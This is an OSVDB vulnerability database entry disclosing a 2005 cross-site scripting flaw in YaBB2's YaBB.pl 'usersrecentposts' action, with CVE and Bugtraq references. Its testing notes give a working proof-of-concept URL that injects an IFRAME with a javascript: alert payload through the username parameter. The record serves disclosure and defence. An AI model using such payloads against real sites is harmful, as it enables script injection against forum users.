YaBB2 YaBB.pl usersrecentposts XSS

2005-03-13T03:24:03
ID OSVDB:14827
Type osvdb
Reporter OSVDB
Modified 2005-03-13T03:24:03

Description

Manual Testing Notes

http://[target]/YaBB.pl?action=usersrecentposts;username=<IFR AME%20SRC%3Djavascript:alert('XSS-Vulnerability')><%252FIFRAME>

References:

Vendor URL: http://www.yabbforum.com/ Security Tracker: 1013420 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-03/0235.html CVE-2005-0741 Bugtraq ID: 12756